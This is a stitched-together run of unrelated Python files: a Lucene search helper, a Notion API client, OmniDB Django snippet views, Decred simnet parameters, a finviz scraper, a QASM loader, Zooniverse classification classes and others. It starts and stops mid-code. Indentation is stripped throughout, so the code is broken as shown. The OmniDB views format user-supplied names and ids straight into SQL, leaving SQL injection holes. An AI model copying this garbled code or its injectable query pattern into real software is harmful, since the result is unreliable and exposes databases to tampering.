out.append(c)
return out
def get_candidates(self, qs, max_cand, max_full_cand=None, save_cache=False, extra_terms=True):
if not max_full_cand:
max_full_cand = max_cand
if prm.docs_path != prm.docs_path_term:
max_cand2 = 0
else:
max_cand2 = max_full_cand
if prm.n_threads > 1:
out = self.search_multithread(qs, max_cand, max_cand2, self.searcher)
if (prm.docs_path != prm.docs_path_term) and extra_terms:
terms = self.search_multithread(qs, max_full_cand, max_full_cand, self.searcher_term)
else:
out = self.search_singlethread(qs, max_cand, max_cand2, self.searcher)
if (prm.docs_path != prm.docs_path_term) and extra_terms:
terms = self.search_singlethread(qs, max_full_cand, max_full_cand, self.searcher_term)
if (prm.docs_path != prm.docs_path_term) and extra_terms:
for outt, termss in itertools.izip(out, terms):
for cand_id, term in itertools.izip(outt.keys()[:max_full_cand], termss.values()):
outt[cand_id] = term
if save_cache:
for q, c in itertools.izip(qs, out):
if q not in self.cache:
self.cache[q] = c
return out
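# Hedged usage sketch (not part of the original module): assumes parameters.py
# points at an existing index and vocabulary built with create_index().
#   ls = LuceneSearch()
#   candidates = ls.get_candidates(['information retrieval'], max_cand=10)
#   print(candidates[0].keys())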
|
import KratosMultiphysics as KM
if not KM.IsDistributedRun():
raise Exception("This test script can only be executed in MPI!")
from KratosMultiphysics.CoSimulationApplication import * # registering tests
def run():
KM.Tester.SetVerbosity(KM.Tester.Verbosity.PROGRESS) # TESTS_OUTPUTS
KM.Tester.RunTestSuite("KratosCosimulationMPIFastSuite")
if __name__ == '__main__':
run()
|
import requests
from Notion.page import Page
from Notion.blocks import Block
from Notion.richtext import RichText
class Notion:
key = None
api_version = '2021-08-16'
def __init__(self, key):
Notion.key = key
def get_basic_headers(self):
return {
'Notion-Version': Notion.api_version,
'Authorization': 'Bearer ' + Notion.key
}
def req_get(self, url, params = {}, headers = {}):
headers.update(self.get_basic_headers())
response = requests.get(url, json = params, headers = headers)
return response.json()
def req_post(self, url, params = {}, headers = {}):
headers.update(self.get_basic_headers())
response = requests.post(url, json = params, headers = headers)
return response.json()
def req_put(self, url, params = {}, headers = {}):
headers.update(self.get_basic_headers())
response = requests.put(url, json = params, headers = headers)
return response.json()
def req_delete(self, url, params = {}, headers = {}):
headers.update(self.get_basic_headers())
response = requests.delete(url, json = params, headers = headers)
return response.json()
def req_patch(self, url, params = {}, headers = {}):
headers.update(self.get_basic_headers())
response = requests.patch(url, json = params, headers = headers)
return response.json()
def get_page(self, page_id, lazy = False):
page = Page(page_id, lazy = lazy, notion_obj = self)
return page
def db_query(self, db_id, filter = {}, sorts = []):
data = {}
if len(filter) != 0:
data['filter'] = filter
if len(sorts) != 0:
            data['sorts'] = sorts
response = self.req_post(f'https://api.notion.com/v1/databases/{db_id}/query', data)
result = []
for page in response['results']:
result.append(Page(data = page, notion_obj = self))
return result
def create_rich_text(self, text):
return RichText(text)
def create_paragraph(self, rt = None):
b = Block()
b.type = 'paragraph'
if rt is not None:
if isinstance(rt, list):
b.rich_text_objects += rt
else:
b.append_richtext(rt)
return b
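if __name__ == '__main__':
    # Hedged usage sketch: the integration token and database id below are
    # placeholders, and db_query() performs a live request against the Notion API.
    notion = Notion('secret_xxx')
    pages = notion.db_query('00000000000000000000000000000000')
    for page in pages:
        print(page)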
|
# String Manipulation and Code Intelligence
print("String Manipulation")
print('''
------------------------------------------------------------------------------------------
We can combine two strings in a print statement using '+', e.g. print("Hello"+"World")
Doing this prints HelloWorld with no space between the words, but we can fix that:
1st approach :
------- >>> print("Hello "+"World")
 - Add a space after Hello, inside the quotation marks, so the space is part of the first string.
2nd approach :
------- >>> print("Hello"+" World")
 - Add a space before World, inside the quotation marks, so the space is part of the second string.
3rd approach :
------- >>> print("Hello" + " " + "World")
 - Join three strings, where the middle one is a single blank space acting as the separator.
Something to Ponder:
 - The print statement does not only print strings; it can print any value stored in a variable:
   just place the variable name inside the brackets, without quotation marks.
Code Intelligence
Code Intelligence auto-completes code as you type; most text editors provide some form of it.
 - It makes coding easier and more enjoyable.
 - It can also flag some errors before the code is run.
 - Such errors are usually indicated by red underlines below the offending code.
''')
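# A short runnable illustration of the approaches described above, plus printing
# a variable (added as an example; the variable name is only illustrative):
print("Hello " + "World")       # space kept at the end of the first string
print("Hello" + " World")       # space kept at the start of the second string
print("Hello" + " " + "World")  # a separate one-character string used as the separator
greeting = "Hello World"
print(greeting)                 # print() accepts variables too, no quotation marks needed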
|
from django.http import HttpResponse
from django.template import loader
from django.http import JsonResponse
from django.core import serializers
import json
import sys
import OmniDB_app.include.Spartacus as Spartacus
import OmniDB_app.include.Spartacus.Database as Database
import OmniDB_app.include.Spartacus.Utils as Utils
from OmniDB_app.include.Session import Session
def get_node_children(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_sn_id_parent = json_object['p_sn_id_parent']
if not v_sn_id_parent:
v_filter = ' is null'
else:
v_filter = ' = {0}'.format(v_sn_id_parent)
v_return['v_data'] = {
'v_list_nodes': [],
'v_list_texts': []
}
try:
#Child nodes
v_child_nodes = v_session.v_omnidb_database.v_connection.Query('''
select sn_id, sn_name
from snippets_nodes
where user_id = {0}
and sn_id_parent {1}
'''.format(v_session.v_user_id,v_filter))
for v_node in v_child_nodes.Rows:
v_node_data = {
'v_id': v_node['sn_id'],
'v_name': v_node['sn_name']
}
v_return['v_data']['v_list_nodes'].append(v_node_data)
#Child texts
v_child_texts = v_session.v_omnidb_database.v_connection.Query('''
select st_id, st_name
from snippets_texts
where user_id = {0}
and sn_id_parent {1}
'''.format(v_session.v_user_id,v_filter))
for v_text in v_child_texts.Rows:
v_text_data = {
'v_id': v_text['st_id'],
'v_name': v_text['st_name']
}
v_return['v_data']['v_list_texts'].append(v_text_data)
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
return JsonResponse(v_return)
def get_snippet_text(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_st_id = json_object['p_st_id']
try:
v_return['v_data'] = v_session.v_omnidb_database.v_connection.ExecuteScalar('''
select st_text
from snippets_texts
where st_id = {0}
'''.format(v_st_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
return JsonResponse(v_return)
def new_node_snippet(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_sn_id_parent = json_object['p_sn_id_parent']
v_mode = json_object['p_mode']
v_name = json_object['p_name']
if not v_sn_id_parent:
v_sn_id_parent = 'null'
try:
if v_mode == 'node':
v_session.v_omnidb_database.v_connection.Execute('''
insert into snippets_nodes values (
(select coalesce(max(sn_id), 0) + 1 from snippets_nodes),'{0}',{1},'','',{2})
'''.format(v_name,v_session.v_user_id,v_sn_id_parent))
else:
v_session.v_omnidb_database.v_connection.Execute('''
insert into snippets_texts values (
(select coalesce(max(st_id), 0) + 1 from snippets_texts),'{0}','','','',{1},{2})
'''.format(v_name,v_sn_id_parent,v_session.v_user_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
def delete_node_snippet(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_id = json_object['p_id']
v_mode = json_object['p_mode']
try:
if v_mode == 'node':
v_session.v_omnidb_database.v_connection.Execute('''
delete
from snippets_nodes
where sn_id = {0}
'''.format(v_id))
else:
v_session.v_omnidb_database.v_connection.Execute('''
delete
from snippets_texts
where st_id = {0}
'''.format(v_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
def save_snippet_text(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_id = json_object['p_id']
v_name = json_object['p_name']
v_text = json_object['p_text']
try:
#new snippet
if not v_id:
v_session.v_omnidb_database.v_connection.Execute('''
insert into snippets_texts values (
(select coalesce(max(st_id), 0) + 1 from snippets_texts),'{0}','{1}','','',null,{2})
'''.format(v_name,v_text.replace("'", "''"),v_session.v_user_id))
#existing snippet
else:
v_session.v_omnidb_database.v_connection.Execute('''
update snippets_texts
set st_text = '{0}'
where st_id = {1}
'''.format(v_text.replace("'", "''"),v_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
def rename_node_snippet(request):
v_return = {}
v_return['v_data'] = ''
v_return['v_error'] = False
v_return['v_error_id'] = -1
#Invalid session
if not request.session.get('omnidb_session'):
v_return['v_error'] = True
v_return['v_error_id'] = 1
return JsonResponse(v_return)
v_session = request.session.get('omnidb_session')
json_object = json.loads(request.POST.get('data', None))
v_id = json_object['p_id']
v_name = json_object['p_name']
v_mode = json_object['p_mode']
try:
#node
if v_mode=='node':
v_session.v_omnidb_database.v_connection.Execute('''
update snippets_nodes
set sn_name = '{0}'
where sn_id = {1}
'''.format(v_name,v_id))
#snippet
else:
v_session.v_omnidb_database.v_connection.Execute('''
update snippets_texts
set st_name = '{0}'
where st_id = {1}
'''.format(v_name,v_id))
except Exception as exc:
v_return['v_data'] = str(exc)
v_return['v_error'] = True
return JsonResponse(v_return)
v_return['v_data'] = ''
return JsonResponse(v_return)
|
from coldtype import *
from defcon import Font
curves = Font(__sibling__("media/digestivecurves.ufo"))
df = "~/Type/fonts/fonts/_wdths/DigestiveVariable.ttf"
def ds(e1, e2):
# 128, -50 on size
return StyledString("Digestive", Style(df, 186-0*e2, fill=1, tu=0+0*e1, wdth=e1, ro=1, bs=0*(1-e2))).pens()
def render_snake(f, fi):
a:Animation = f.a
at1 = a.progress(fi, loops=10, easefn="ceio")
at2 = a.progress(fi, loops=10, easefn="ceio")
track = DATPen()
curves["path1"].draw(track)
track.scaleToRect(f.a.r).align(f.a.r, th=1, tv=1).translate(0, -20).f(None).s(1).sw(1).scale(1.15)
t = track.copy()
track.repeat(3)#.scale(1.15)
dps:DATPenSet = ds(at1.e, at2.e)
minw = ds(0, 0).getFrame(th=1).point("SE").x
maxw = ds(1, 1).getFrame(th=1).point("SE").x
if at1.loop_phase == 1:
offset = maxw-dps.getFrame(th=1).point("SE").x
else:
offset = 0
offset += math.floor(at1.loop/2)*(maxw-minw)
dps.distributeOnPath(track, offset=offset).reversePens()
return t, dps
t = Timeline(350, storyboard=[0, 20, 349])
@animation(rect=(1920,500), timeline=t)
def render(f):
test = False
if test:
_, zero = render_snake(f, 0)
track, now = render_snake(f, f.i)
bg = hsl(0, l=0.97)
return DATPenSet([
DATPen().rect(f.a.r).f(bg),
DATPenSet([
zero.f(hsl(0.1, l=0.8)) if test else DATPen(),
track.f(None).s(hsl(0.65, l=0.9)).sw(15).translate(0, -8),
now.f(hsl(0.9, l=0.6, s=0.7))#.understroke(s=bg, sw=5),
#track.copy().translate(0, 180),
]).translate(0, -30)
])
|
"""
Copyright (c) 2019, Brian Stafford
Copyright (c) 2019, The Decred developers
See LICENSE for details
simnet holds simnet parameters. Any values should mirror exactly
https://github.com/decred/dcrd/blob/master/chaincfg/simnetparams.go
"""
# SimNetParams defines the network parameters for the simulation test network.
# This network is similar to the normal test network except it is intended for
# private use within a group of individuals doing simulation testing and full
# integration tests between different applications such as wallets, voting
# service providers, mining pools, block explorers, and other services that
# build on Decred.
#
# The functionality is intended to differ in that the only nodes which are
# specifically specified are used to create the network rather than following
# normal discovery rules. This is important as otherwise it would just turn
# into another public testnet.
Name = "simnet"
DefaultPort = "18555"
DNSSeeds = None # NOTE: There must NOT be any seeds.
# Chain parameters
GenesisHash = "5bec7567af40504e0994db3b573c186fffcc4edefe096ff2e58d00523bd7e8a6"
PowLimit = 2 ** 255 - 1
PowLimitBits = 0x207FFFFF
ReduceMinDifficulty = False
MinDiffReductionTime = 0  # Does not apply since ReduceMinDifficulty is false
GenerateSupported = False
MaximumBlockSizes = [1310720]
MaxTxSize = 1000000
TargetTimePerBlock = 1  # one second
WorkDiffAlpha = 1
WorkDiffWindowSize = 8
WorkDiffWindows = 4
TargetTimespan = 8 # TimePerBlock * WindowSize
RetargetAdjustmentFactor = 4
# Subsidy parameters.
BaseSubsidy = 50000000000
MulSubsidy = 100
DivSubsidy = 101
SubsidyReductionInterval = 128
WorkRewardProportion = 6
StakeRewardProportion = 3
BlockTaxProportion = 1
# Checkpoints ordered from oldest to newest.
Checkpoints = (None,)
# Consensus rule change deployments.
#
# The miner confirmation window is defined as:
# target proof of work timespan / target proof of work spacing
# 10% of RuleChangeActivationInterval * TicketsPerBlock
RuleChangeActivationQuorum = 160
RuleChangeActivationMultiplier = 3 # 75%
RuleChangeActivationDivisor = 4
RuleChangeActivationInterval = 320 # 320 seconds
# Enforce current block version once majority of the network has upgraded.
# 51% (51 / 100)
# Reject previous block versions once a majority of the network has upgraded.
# 75% (75 / 100)
BlockEnforceNumRequired = 51
BlockRejectNumRequired = 75
BlockUpgradeNumToCheck = 100
# AcceptNonStdTxs is a mempool param to either accept and relay
# non standard txs to the network or reject them
AcceptNonStdTxs = True
# Address encoding magics
NetworkAddressPrefix = ("S",)
PubKeyAddrID = (0x276F).to_bytes(2, byteorder="big") # starts with Sk
PubKeyHashAddrID = (0x0E91).to_bytes(2, byteorder="big") # starts with Ss
PKHEdwardsAddrID = (0x0E71).to_bytes(2, byteorder="big") # starts with Se
PKHSchnorrAddrID = (0x0E53).to_bytes(2, byteorder="big") # starts with SS
ScriptHashAddrID = (0x0E6C).to_bytes(2, byteorder="big") # starts with Sc
PrivateKeyID = (0x2307).to_bytes(2, byteorder="big") # starts with Ps
# BIP32 hierarchical deterministic extended key magics
HDPrivateKeyID = (0x0420B903).to_bytes(4, byteorder="big") # starts with sprv
HDPublicKeyID = (0x0420BD3D).to_bytes(4, byteorder="big") # starts with spub
# BIP44 coin type used in the hierarchical deterministic path for
# address generation.
SLIP0044CoinType = 1 # SLIP0044, Testnet (all coins)
LegacyCoinType = 115 # ASCII for s, for backwards compatibility
# Decred PoS parameters
MinimumStakeDiff = 20000
TicketPoolSize = 64
TicketsPerBlock = 5
TicketMaturity = 16
TicketExpiry = 384 # 6*TicketPoolSize
CoinbaseMaturity = 16
SStxChangeMaturity = 1
TicketPoolSizeWeight = 4
StakeDiffAlpha = 1
StakeDiffWindowSize = 8
StakeDiffWindows = 8
StakeVersionInterval = 8 * 2 * 7
MaxFreshStakePerBlock = 20 # 4*TicketsPerBlock
StakeEnabledHeight = 16 + 16 # CoinbaseMaturity + TicketMaturity
StakeValidationHeight = 16 + (64 * 2) # CoinbaseMaturity + TicketPoolSize*2
StakeBaseSigScript = (0xDEADBEEF).to_bytes(4, byteorder="big")
StakeMajorityMultiplier = 3
StakeMajorityDivisor = 4
# Decred organization related parameters
#
# Treasury address is a 3-of-3 P2SH going to a wallet with seed:
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# aardvark adroitness aardvark adroitness
# briefcase
# (seed 0x0000000000000000000000000000000000000000000000000000000000000000)
#
# This same wallet owns the three ledger outputs for simnet.
#
# P2SH details for simnet treasury:
#
# redeemScript: 532103e8c60c7336744c8dcc7b85c27789950fc52aa4e48f895ebbfb
# ac383ab893fc4c2103ff9afc246e0921e37d12e17d8296ca06a8f92a07fbe7857ed1d4
# f0f5d94e988f21033ed09c7fa8b83ed53e6f2c57c5fa99ed2230c0d38edf53c0340d0f
# c2e79c725a53ae
# (3-of-3 multisig)
# Pubkeys used:
# SkQmxbeuEFDByPoTj41TtXat8tWySVuYUQpd4fuNNyUx51tF1csSs
# SkQn8ervNvAUEX5Ua3Lwjc6BAuTXRznDoDzsyxgjYqX58znY7w9e4
# SkQkfkHZeBbMW8129tZ3KspEh1XBFC1btbkgzs6cjSyPbrgxzsKqk
#
# Organization address is ScuQxvveKGfpG1ypt6u27F99Anf7EW3cqhq
OrganizationPkScript = (0xA914CBB08D6CA783B533B2C7D24A51FBCA92D937BF9987).to_bytes(
23, byteorder="big"
)
OrganizationPkScriptVersion = 0
# BlockOneLedger = BlockOneLedgerSimNet,
BlockOneSubsidy = int(300000 * 1e8)
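if __name__ == "__main__":
    # Hedged sanity checks (not part of the original parameter file) for the
    # derived values noted in the comments above.
    assert TargetTimespan == TargetTimePerBlock * WorkDiffWindowSize
    assert TicketExpiry == 6 * TicketPoolSize
    assert MaxFreshStakePerBlock == 4 * TicketsPerBlock
    assert StakeEnabledHeight == CoinbaseMaturity + TicketMaturity
    assert StakeValidationHeight == CoinbaseMaturity + TicketPoolSize * 2
    print("simnet parameter cross-checks passed")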
|
from oslo_utils import importutils
profiler_opts = importutils.try_import('osprofiler.opts')
def register_opts(conf):
if profiler_opts:
profiler_opts.set_defaults(conf)
def list_opts():
return {
profiler_opts._profiler_opt_group: profiler_opts._PROFILER_OPTS
}
|
if __name__ =='__main__':
    n = int(input("Enter number of scores: "))
    arr = list(set(map(int, input("Enter space separated list of scores: ").split())))
    print(sorted(arr, reverse=True)[1])
|
# Copyright (c) 2021-2022 Kabylkas Labs.
# Licensed under the Apache License, Version 2.0.
# Python packages.
import requests
from bs4 import BeautifulSoup
# Local packages.
import stockmarketapi.constants as constants
# Helper functions.
def GetContent(url):
req = requests.get(url, headers = constants.kHtmlHeader)
soup = BeautifulSoup(req.content, 'html.parser')
return soup
# Implementation methods of the API.
def GetCurrentPrice(ticker):
url = constants.kFinvizQuoteUrl.format(ticker)
soup = GetContent(url)
all_content = soup.find("div", { "data-testid": "quote-data-content" })
table_content = all_content.find_all("td")
found_price = False
price_element = ""
for data in table_content:
if found_price:
price_element = "{}".format(data)
break
if "Price" in data:
found_price = True
parse_stage_1 = price_element.split("<b>")
parse_stage_2 = parse_stage_1[1].split("</b>")
price = parse_stage_2[0]
return float(price)
def GetROIC(ticker):
url = constants.kGuruFocusRoicUrl.format(ticker)
soup = GetContent(url)
roic_div = soup.find("div", { "id": "target_def_description" })
strongs = roic_div.find_all("strong")
strong = "{}".format(strongs[3])
parse_stage_1 = strong.split("<strong>")
parse_stage_2 = parse_stage_1[1].split("%")
roic = parse_stage_2[0]
return float(roic)
def LoadMarket():
print("Loading market...")
market_tickers = []
url = constants.kFinvizEmptyScreenerUrl
next_found = True
pages_parsed = 0
while next_found:
print("Parsing {}".format(url))
soup = GetContent(url)
# Get the anchor that links to the next page.
all_links = soup.find_all("a", { "class" : "tab-link"})
next_found = False
for link in all_links:
string_link = "{}".format(link)
if "next" in string_link:
next_found = True
s = string_link.split("\"")
save_link = s[3]
save_link = save_link.replace("&", "&")
if next_found:
url = "https://finviz.com/{}".format(save_link)
# Get the tickers.
screener_content_div = soup.find("div", { "id" : "screener-content"} )
ticker_links = screener_content_div.find_all("a", { "class" : "screener-link-primary"})
for link in ticker_links:
string_link = "{}".format(link)
s_0 = string_link.split("?t=")
s_1 = s_0[1].split("&")[0]
market_tickers.append(s_1)
# Increment the count.
pages_parsed += 1
        print("Pages parsed: {}".format(pages_parsed))
print(market_tickers)
return market_tickers
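if __name__ == "__main__":
    # Hedged usage sketch: "AAPL" is a placeholder ticker, and both calls perform
    # live scraping against the URLs configured in stockmarketapi.constants.
    print("Price:", GetCurrentPrice("AAPL"))
    print("ROIC:", GetROIC("AAPL"))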
|
import collections
Node = collections.namedtuple('Node', 'val left right')
# some sample trees having various node counts
tree0 = None # empty tree
tree1 = Node(5, None, None)
tree2 = Node(7, tree1, None)
tree3 = Node(7, tree1, Node(9, None, None))
tree4 = Node(2, None, tree3)
tree5 = Node(2, Node(1, None, None), tree3)
tree6 = Node(2, Node(1, Node(1, tree5, Node(2, None, tree3)), tree4), Node(2, None, tree3))
tree7 = Node(2, Node(1, Node(1, tree5, Node(2, tree6, tree3)), tree4), Node(2, tree6, tree3))
def flatten(bst):
# empty case
if bst is None:
return []
# node case
return flatten(bst.left) + [bst.val] + flatten(bst.right)
def flatten_iter(bst):
left = []
parents = []
def descend_left(bst):
while bst is not None:
parents.append(bst)
bst = bst.left
descend_left(bst)
while parents:
bst = parents.pop()
left.append(bst.val)
descend_left(bst.right)
return left
# tests
def check_flattener(f):
assert f(tree0) == []
assert f(tree1) == [5]
assert f(tree2) == [5, 7]
assert f(tree3) == [5, 7, 9]
assert f(tree4) == [2, 5, 7, 9]
assert f(tree5) == [1, 2, 5, 7, 9]
print('ok')
# check_flattener(flatten)
# time measurement
import timeit
def recursive():
flatten(tree7)
def iterative():
    flatten_iter(tree7)
for func in [recursive, iterative]:
    print(func.__name__, timeit.timeit(func, number=1_000_000))
|
# ===--- gyb_stdlib_unittest_support.py --------------*- coding: utf-8 -*-===//
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
TRACE = '''
_ message: @autoclosure () -> String = "",
stackTrace: SourceLocStack = SourceLocStack(),
showFrame: Bool = true,
file: String = #file, line: UInt = #line'''
stackTrace = 'stackTrace.pushIf(showFrame, file: file, line: line)'
trace = 'message(),\n stackTrace: ' + stackTrace
|
from .analyzer import Analyzer
from .formatter import Formatter
from . import yacc
import io
import sys
import traceback
def translate(qasm) :
strfile = io.StringIO()
formatter = Formatter(file=strfile)
# formatter.set_funcname(factory_name)
analyzer = Analyzer(formatter)
yacc.parse(qasm, analyzer)
code = strfile.getvalue()
strfile.close()
return code
def translate_file(filename) :
with open(filename, 'r') as file :
qasm = file.read()
return translate(qasm)
class QasmModule :
pass
def load_circuit(qasm) :
code = translate(qasm)
module = QasmModule()
errmsg = None
try :
exec(code, module.__dict__)
except Exception as e:
detail = e.args[0]
cl, exc, tb = sys.exc_info()
lineno = traceback.extract_tb(tb)[-1][1]
lines = code.splitlines()
errmsg = '{}, \'{}\''.format(detail, lines[lineno - 1])
ex_factory = e.__class__
finally :
if errmsg is not None :
raise ex_factory(errmsg)
return module
def load_circuit_from_file(filename) :
with open(filename, 'r') as file :
qasm = file.read()
return load_circuit(qasm)
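# Hedged usage sketch (not part of the original module; the file name is a placeholder):
#   module = load_circuit_from_file('bell_pair.qasm')
#   print(translate_file('bell_pair.qasm'))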
|
#!/usr/bin/env python3
import json
from collections import OrderedDict
###################################################################################################
# A set of container classes for Scarlets and Blues data
# The classificationObject is the basic type which comprises an Ordered Dictionary and a key index
# to lookup entries by the order the were entered.
# The class also includes methods to add new items and retrieve by key or index position
#
# classificationRow, classificationRecord and classificationRecordSet are all types of classificationObject
#
# A Row represents an entry in the export csv where the data is loaded from
# A Record consists of a set of values entered by a transcriber in response to task questions
# e.g. T0='enter surname', T1='enter initials'
# In this case T0 and T1 are a series of tasks which group together to form one record
# The record may represent a row in a table, or an item within some meeting minutes
# A RecordSet is a collection of Record objects. This may represent all of the rows in a table,
# or all of the items on the meeting agenda.
#
# A taskActions object contains a set of tasks with actions assigned to each one.
# A transcription workflow (e.g. People) consists of a defined set of tasks. Some task ids (e.g. T0) will signify
# the beginning of a larger task, others signify the capture of data, and others the end of the main task.
# These roles are represented in a taskActions object as 'create', 'add' and 'close', respectively
# The classificationRecordset object uses actions to group together task answers into Records
#
###################################################################################################
import re
class Ditto:
def __init__(self):
self.value = '-do-'
def is_ditto(self, text):
assert not re.search(r'[-_]+d[do][-_]+d+[do][-_]+', text), "Double -do- style ditto"
assert not re.search(r'""', text), 'Double " style ditto' #Maybe should treat this as finger-stutter and collapse to one ditto
return re.fullmatch(r'(?:^|\s)("|[-_~]+d+[do][-_~]+)(?:\s|$)', text) is not None
def update(self, value):
self.value = value
def __str__(self):
return str(self.value)
def __repr__(self):
return str(self.value)
class classificationObject:
delimiter = chr(32) #This is space (i.e. ' ')
def __init__(self, parent = None, predecessor = None):
self.items = OrderedDict() # Maintains entry order when iterated over
self.key_index = [] # Despite maintaining order, OrderedDict does not have a method for looking up the ith item
#self.delimiter = chr(32) # Used by get_delimited method, this should be overridden by each subclass so each has a unique delimiter
self.parent = parent
self.predecessor = predecessor
self.has_dittos = False
def add(self, value, key = None): # Add a new entry to the object
if key is None:
key = len(self.items)
if isinstance(value, str):
if len(value) == 0:
value = chr(0) # This is needed for aligning empty strings/values
if key in self.items: #Sometimes we have multiple instances of the same key (e.g. repeatable fields)
key += f'_{len(self.items)}'
assert not key in self.items
self.items[key] = value
self.key_index.append(key)
def get_last_added(self):
if len(self.key_index) == 0:
return None
return self.get_by_index(len(self.key_index)-1)
def get_by_key(self, key): # Lookup a known key
return self.items[key]
def get_by_index(self, index): # Lookup the Nth item
if isinstance(index, list):
if len(index) == 1:
assert(index[0] != -1)
#if index[0] == -1:
# return ""
assert(index[0] >= 0 and index[0] < len(self.key_index)), f'{index[0]}, {len(self.key_index)}, {self.key_index}'
#if index[0] >= len(self.key_index):
# return self.items
return self.items[self.key_index[index[0]]]
else:
if isinstance(self.items[self.key_index[index[0]]], classificationObject):
return self.items[self.key_index[index[0]]].get_by_index(index[1:])
else:
print(self.items[self.key_index[index[0]]],"not CO")
else:
assert(index != -1)
assert(index >= 0 and index < len(self.key_index))
#if index == -1:
# return ""
#if index >= len(self.key_index):
# return self.items
return self.items[self.key_index[index]]
def __str__(self):
return str(self.items)
def __repr__(self):
return str(self)
def get_delimited(self): # Turn object into a delimited string; could potentially be called by the __str__ method
delim_entry = ""
for r in self.items.values():
delim_entry += self.delimiter
if r is None:
delim_entry += ""
elif isinstance(r, classificationObject): # This is why delimiters should be unique to subclass, so
# records, fields, words are delimited differently
delim_entry += r.get_delimited()
else:
delim_entry += str(r)
return delim_entry[1:] # first character will be a delimiter so remove it
# A classificationRow represents a row of the csv export from Zooniverse
class classificationRow(classificationObject):
# Fields expected in the Zooniverse export csv plus subject_name which is extracted from another field
#__field_lookup = {'classification_id':0, 'user_name':1, 'user_id':2, 'user_ip':3, 'workflow_id':4, 'workflow_name':5,
# 'workflow_version':6, 'created_at':7, 'gold_standard':8, 'expert':9, 'metadata':10, 'annotations':11,
# 'subject_data':12, 'subject_ids':13, 'subject_name':14}
__field_list = ['classification_id', 'user_name', 'user_id', 'user_ip', 'workflow_id', 'workflow_name',
'workflow_version', 'created_at', 'gold_standard', 'expert', 'metadata', 'annotations',
'subject_data', 'subject_ids', 'subject_name']
#def __init__(self):
# super().__init__()
def add_row(self, row): # Expecting an already split row in a list
for i,fld in enumerate(row):
try:
j_fld = json.loads(fld) # If the contents of the field are json this will be successful and j_fld will be a dictionary
except: # if they're just a string there will be an exception
j_fld = fld
self.add(j_fld, self.__field_list[i])
subject_id = self.get_by_key('subject_ids')
subject_data = self.get_by_key('subject_data')
# Ideally the subject_id would be used but this changes when images are reloaded
# so name is more consistent, although the case varies for how Name is named.
if 'name' in subject_data[str(subject_id)]:
subject = subject_data[str(subject_id)]['name']
if 'Name' in subject_data[str(subject_id)]:
subject = subject_data[str(subject_id)]['Name']
subject = subject.replace(" ","/")
self.add(subject, 'subject_name')
# A classificationRecordSet is expected to be multiple entries on a page
# For example a list of names in the People workflow
class classificationRecordSet(classificationObject):
delimiter = chr(30) #^^ in less
#def __init__(self, parent=None, predecessor=None):
# super().__init__(parent, predecessor)
# self.delimiter = chr(30) # This will be the delimiter between records with a RecordSet
def set_actions(self, actions): # Actions are used to group tasks to make a record (i.e. fields within a record - surname etc.)
self.actions = actions
def add_annotation(self, annotation):
R = None
# an annotation contains all of the tasks performed by a transcriber for a workflow on a subject (page of document)
# By following the task order for a specific group of tasks we can build a Record
# Each Record is then added to the RecordSet
ann_queue = [] # use a queue because of nested tasks in lists (see below)
record_id = 0
prev_record = None
for ann in annotation: # each annotation is a dictionary containing a task and a value
ann_queue.append(ann)
while len(ann_queue) > 0:
this_ann = ann_queue.pop(0)
#print(this_ann)
# some tasks consist of sub-tasks which are held in a list
# This will convert a list into multiple entries in the queue
if isinstance(this_ann['value'], list) and len(this_ann['value']) > 0:
if 'task' in this_ann['value'][0]:
for v in this_ann['value']:
assert 'task' in v, 'Broken assumption: value list can only be all tasks or all something else'
ann_queue.append(v)
else: #assume this is a multichoice -- which we happen to want to treat as multiple records of the given task type
for v in sorted(this_ann['value']): #We aren't bothered about the order (which might not match what is on the page anyway) and sorting these will make alignment easier
ann_queue.append({'task': f'{this_ann["task"]}_mc', 'value': v})
if this_ann['task'] in self.actions: # only interested in certain tasks
actions = self.actions[this_ann['task']]
#If the action is a callable then it is supposed to extend the queue
for callback in filter(lambda x: callable(x), actions):
ann_queue.extend(callback(this_ann))
if 'close' in actions or 'create' in actions:
